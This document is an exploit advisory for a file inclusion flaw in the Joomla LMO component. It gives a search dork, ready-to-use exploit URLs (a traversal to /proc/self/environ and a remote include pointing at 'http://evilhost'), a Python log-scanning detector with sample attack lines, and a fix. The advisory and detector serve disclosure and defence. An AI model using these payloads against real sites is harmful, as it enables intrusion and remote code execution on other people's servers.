Joomla Component com_lmo <= 1.0b2 Remote Include Vulnerability in LMO - Joomla! Component
==============================================================
Joomla Component com_lmo <= 1.0b2 Remote Include Vulnerability
==============================================================
Application : LMO - Joomla! Component
URL : http://forge.joomla.org/sf/projects/lmo
The global $mosConfig_absolute_path is used without being initialised or sanitized, so the exploit works when PHP's register_globals=on (the attacker supplies the variable in the request).
The vulnerable code is in components/com_lmo/lmo.php on lines 11-12:
$lmo_dateipfad=$mosConfig_absolute_path."/administrator/components/com_lmo/";
$lmo_url=$mosConfig_live_site."/administrator/components/com_lmo/";
Exploit:
~~~~~~~~
dork: "com_lmo"
Local file inclusion through the controller parameter (%00 is a null byte that truncates whatever the script appends to the path):
http://localhost/index.php?option=com_lmo&controller=../../../../../../../../../../../../../../../proc/self/environ%00
----------------------------------------------
Remote file inclusion through the injected global (register_globals=on):
http://localhost/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=[RFI]
http://www.vuln.com/components/com_lmo/lmo.php?mosConfig_absolute_path=http://evilhost
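The two request shapes above are easy to hunt for in web server logs. The following Python detector is an added example written for this page, not code from the advisory author or the LMO project: it parses Apache combined-format lines, decodes each query parameter, and flags the markers of this bug class (attempts to override a mosConfig_* global, URL-valued parameters, directory traversal, null bytes, and direct requests to components/com_lmo/lmo.php). The log lines, IP addresses and hostnames are constructed for the example; the first two reproduce the advisory's URLs, the other two are benign-looking traffic for contrast.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access log (Apache combined format). Hosts and addresses are
# invented; the first two request lines follow the advisory's exploit URLs.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Apr/2018:10:00:01 +0000] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://evilhost/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Apr/2018:10:00:02 +0000] "GET /index.php?option=com_lmo&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [09/Apr/2018:10:00:03 +0000] "GET /index.php?option=com_lmo&Itemid=12 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.7 - - [09/Apr/2018:10:00:04 +0000] "GET /index.php?option=com_lmo&mosConfig_absolute_path=/var/www HTTP/1.1" 200 4096 "-" "curl/7.58"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Stream wrappers PHP will happily include() from when allow_url_include is on.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftp|php|data)://', re.I)


def classify_request(target):
    """Return a list of (finding, parameter-or-path) tuples for one request target."""
    findings = []
    parts = urlsplit(target)
    # keep_blank_values keeps "Itemid=" visible; parse_qsl already percent-decodes once,
    # the extra unquote() catches double-encoded payloads such as %2500.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = unquote(value)
        if name.startswith('mosConfig_'):
            # Joomla 1.0 config globals never belong in a query string; supplying one
            # only has an effect under register_globals=on, so it is always suspicious.
            findings.append(('config_global_override', name))
        if REMOTE_SCHEME_RE.match(decoded):
            # Classic RFI: the trailing "?" in the sample turns whatever the script
            # appends into a query string for the attacker's host.
            findings.append(('remote_include', name))
        if '../' in decoded or '..\\' in decoded:
            findings.append(('path_traversal', name))
        if '\x00' in decoded:
            findings.append(('null_byte', name))
    if parts.path.endswith('/components/com_lmo/lmo.php'):
        # The component file is only meant to be loaded through index.php.
        findings.append(('direct_component_access', parts.path))
    return findings


def scan_log(text):
    """Parse each log line and return the requests that produced at least one finding."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group('target'))
        if findings:
            hits.append({'ip': m.group('ip'), 'ts': m.group('ts'),
                         'target': m.group('target'), 'findings': findings})
    return hits


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit['ip'], hit['ts'], hit['target'])
        for finding, where in hit['findings']:
            print('    ', finding, '->', where)
```

Run against a real log, feed the file contents to scan_log(); the fourth sample line shows why the mosConfig_ check is kept separate from the URL check: a local path such as /var/www is still an override attempt even though it is not a remote include.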
Fix
~~~~
Add the following line before the component's code. It is Joomla 1.0's standard direct-access guard: lmo.php then dies unless it was loaded through index.php, which stops the lmo.php?mosConfig_absolute_path=... vector above:
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');
Also keep register_globals=off; with it off, a request parameter cannot populate $mosConfig_absolute_path in the first place.
vitux
# 0day.today [2018-04-09] #